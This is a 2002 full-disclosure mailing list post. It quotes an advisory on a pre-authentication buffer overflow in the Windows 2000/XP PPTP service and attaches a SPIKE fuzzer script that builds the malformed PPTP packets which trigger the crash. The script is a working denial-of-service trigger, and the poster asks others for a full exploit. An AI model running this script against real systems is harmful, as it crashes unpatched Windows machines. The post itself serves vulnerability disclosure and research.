'[Full-Disclosure] Re: Microsoft PPTP Server and Client remote vulnerability'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-Disclosure] Re: Microsoft PPTP Server and Client remote vulnerability
From:       Dave Aitel <dave () immunitysec ! com>
Date:       2002-09-26 20:13:21
[Download RAW message or body]

[Attachment #2 (multipart/mixed)]


SPIKE 2.6.2 or above should be able to handle this .spk file which will
replicate the vulnerability. Someone send me a working sploit in
exchange, please. I'm too lazy to muck with it. (Or I have other
exploits to muck with, one or the other :>)


-dave
P.S. Grab new SPIKE releases (2.6.2 for SPIKE and 1.3 for SPIKE Proxy)
at http://www.immunitysec.com/spike.html, if you haven't already. 
P.P.S. This script is released under the terms of the GNU GPL v 2.0.


On Thu, 2002-09-26 at 05:43, sh@phion.com wrote:
> phion Security Advisory 26/09/2002
> 
> Microsoft PPTP Server and Client remote vulnerability
> 
> 
> Summary
> -----------------------------
> 
>    The Microsoft PPTP Service shipping with Windows 2000 and XP contains a
>    remotely exploitable pre-authentication bufferoverflow.
> 
> 
> Affected Systems
> -----------------------------
> 
>    Microsoft Windows 2000 and XP running either a PPTP Server or Client.
> 
> 
> Impact
> -----------------------------
> 
>    With a specially crafted PPTP packet it is possible to overwrite kernel
>    memory.
> 
>    A DoS resulting in a lockup of the machine has been verified on
>    Windows 2000 SP3 and Windows XP.
> 
>    A remote compromise should be possible deploying proper shellcode,
>    as we were able to fill EDI and EDX with our data.
> 
>    Clients are vulnerable too, because the Service always listens on port
>    1723 on any interface of the machine, this might be of special concern
>    to DSL users which use PPTP to connect to their modem.
> 
> 
> Solution
> -----------------------------
> 
>    As a temporary solution for the Client issue, one might firewall the PPTP
>    port in the Internet Connection Firewall for Windows XP.
> 
>    We dont know of any solution for Windows 2000 and Windows XP PPTP servers.
> 
>    The vendor has been informed.
> 
> 
> Acknowledgements
> -----------------------------
> 
>    The bug has been discovered by Stephan Hoffmann and Thomas Unterleitner
>    on behalf of phion Information Technologies.
> 
> 
> Contact Information
> -----------------------------
> 
>    phion Information Technologies can be reached via:
>       office@phion.com / http://www.phion.com
> 
>    Stephan Hoffmann can be reached via:
>       sh@phion.com
> 
>    Thomas Unterleitner can be reached via:
>       t.unterleitner@phion.com
> 
> References
> -----------------------------
> 
>    [1] phion Information Technologies
>        http://www.phion.com/
> 
> Exploit
> -----------------------------
> 
>    phion Information Technologies will not provide an exploit for this issue.
> 
> 
> Disclaimer
> -----------------------------
> 
>    This advisory does not claim to be complete or to be usable for any
>    purpose.
> 
>    This advisory is free for open distribution in unmodified form.
> 
>    Articles or Publications that are based on information from this advisory
>    have to include link [1].
> 
> 


["pptp.spk" (pptp.spk)]

//start control request
s_block_start("PPTP");
s_binary_block_size_halfword_bigendian("PPTP");
//message type 1 -  control request
s_int_variable(0x0001,5);
//cookie
s_binary("1a 2b  3c 4d");
//type 1 -  start control request
//5 is big endian halfword
s_int_variable(0x0001,5);
//reserved
s_binary("0000");
//version 1.0
s_int_variable(0x0100,5);
//reserved
s_binary("0000");
//Framing: Ethernet
s_binary("00000003");
//Bearer: Digital
s_binary("00000002");
//maximum channels
s_binary("ffff");
//firmware revision
s_int_variable(0x0001,5);

//hostname
s_string_variable("A");
s_binary_repeat("00",63);

//vendor
s_string_variable("A");
s_binary_repeat("00",63);

s_block_end("PPTP");


///
/// NEXT PACKET
///
///

//start outgoing call request
s_block_start("PPTP2");
s_binary_block_size_halfword_bigendian("PPTP2");
//message type 1 -  control request
s_int_variable(0x0001,5);

//cookie
s_binary("1a 2b  3c 4d");
//type 1 -  outgoing call request
//5 is big endian halfword
s_int_variable(0x0007,5);
//reserved
s_binary("0000");

//call id
s_binary("0000");

//serial number
s_binary("0000");

//min bps
s_binary("00000960");
//max bps
s_binary("00989680");
//bearer capabilities
s_binary("00000002");
//framing
s_binary("00000003");
//recieve window size
s_binary("0003");
//processing delay
s_binary("0000");

s_binary_block_size_halfword_bigendian("PHONENUMBER");
//reserved
s_binary("0000");
s_block_start("PHONENUMBER");
s_string_variable("");
s_block_end("PHONENUMBER");
//subaddress
s_string_variable("");
s_block_end("PPTP2");





["signature.asc" (application/pgp-signature)]
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic